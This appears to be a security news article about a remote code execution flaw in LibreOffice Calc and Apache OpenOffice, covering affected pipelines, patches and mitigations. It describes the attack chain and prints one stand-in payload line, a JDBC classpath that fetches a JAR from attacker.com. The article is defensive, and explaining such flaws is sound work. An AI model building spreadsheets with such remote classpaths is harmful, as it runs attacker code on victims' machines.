A crafted spreadsheet opens in LibreOffice Calc. No macro warning appears. Within one second, Calc silently connects to an attacker’s server, downloads a Java class, and runs it — inside your process, as your user. This is CVE-2026-63277, a high-severity flaw (CVSS 8.5) patched by the Document Foundation on October 5. Apache OpenOffice carries the same vulnerability under CVE-2026-59265 and has no patch yet.
The Attack Does Not Look Like an Attack
The word “macro” has trained developers to watch for a specific prompt. LibreOffice and OpenOffice show a warning before running macros embedded in documents. CVE-2026-63277 bypasses that entirely by abusing a different feature: database ranges.
LibreOffice Calc can link a block of cells to an external database and refresh that data automatically. A malicious spreadsheet configures one of these ranges to auto-refresh one second after the file loads, targeting a remote .odb database file on the attacker’s server. When Calc fetches that file, the .odb specifies a Java Database Connectivity (JDBC) driver with a classpath pointing to a remote JAR — jar:http://attacker.com/payload.jar!/. Calc downloads and loads that JAR. The driver class inside it is the attacker’s code, now running inside your LibreOffice process.
No macro warning. No “enable content” dialog. The attack requires only that Java support is enabled — the default on many Linux installations. Rick de Jager of V12 Security and Thomas Rinsma and Edoardo Geraci of Codean Labs discovered this independently. V12 has published proof-of-concept files. The CVSS 4.0 score is 8.5, rated HIGH.
Your CI/CD Pipeline Is the Real Target
Desktop users who are careful about opening untrusted files have some natural protection. Automated pipelines do not.
Headless LibreOffice is a standard tool for server-side document processing. Development teams use it to convert user-uploaded spreadsheets to PDF, extract data from XLSX files, or generate reports. The command looks like this:
soffice --headless --convert-to pdf /uploads/report.ods
Converting a file requires opening it. Opening a maliciously crafted file triggers the database range refresh. If Java is enabled in the headless LibreOffice installation — and it often is, because default packages on Ubuntu and Debian include Java support — the attack fires before the conversion finishes.
Pipeline servers typically run with higher privileges than a desktop user, have network egress to reach external servers, and process untrusted input by design. CVE-2026-63277 turns a document processing service into an unauthenticated remote code execution surface. Every engineering team running headless LibreOffice should treat this as a priority patch.
OpenOffice: Same Flaw, No Patch
Apache OpenOffice carries CVE-2026-59265, which covers the same JDBC driver loading attack on its Calc implementation. Every version through 4.1.16 is affected. The OpenOffice project says a fix will arrive in 4.1.17, which is “still being tested” as of this writing — no release date given.
Until a patch ships, the official mitigation is to disable Java integration: Tools > Options > OpenOffice > Java, uncheck “Use a Java runtime environment.” This blocks the attack because the JDBC driver loading step requires Java. It also breaks any legitimate JDBC database connectivity you rely on.
OpenOffice has a long history of slow security responses. For organizations using it in production — particularly in European government contexts and education — this is another reason to accelerate migration to LibreOffice or a maintained alternative. Waiting for 4.1.17 is a calculated gamble with a public PoC already circulating.
What to Do Now
If you run LibreOffice: Upgrade to 26.2.5 or 26.8.0. Both are available at libreoffice.org/security. The fix restricts JDBC classpaths to file:// URLs only, cutting off the remote JAR loading step entirely.
If you run headless LibreOffice in a pipeline: Patch first. Then audit whether Java support is actually required for your use case. If you are only doing format conversion — not JDBC database queries — consider disabling Java regardless. It reduces your attack surface for this entire class of vulnerability.
If you run Apache OpenOffice: Disable Java now. Do not wait for 4.1.17. Begin evaluating LibreOffice as a migration target.
The Trend Worth Watching
File-format RCE attacks are increasingly routing around macro warnings. Microsoft Office saw CVE-2026-21509 earlier this year — RCE via RTF that bypasses the macro prompt. Excel had its own preview-pane exploitation path in June. Now LibreOffice’s database connectivity is the vector.
The attack surface has shifted. “Don’t enable macros” is no longer sufficient advice for developers who process documents in any automated way. The right question to ask about any document-processing pipeline is: what features does this software enable by default, and which of those features can reach the network? For CVE-2026-63277, the answer was: database ranges, by default, with no user warning.













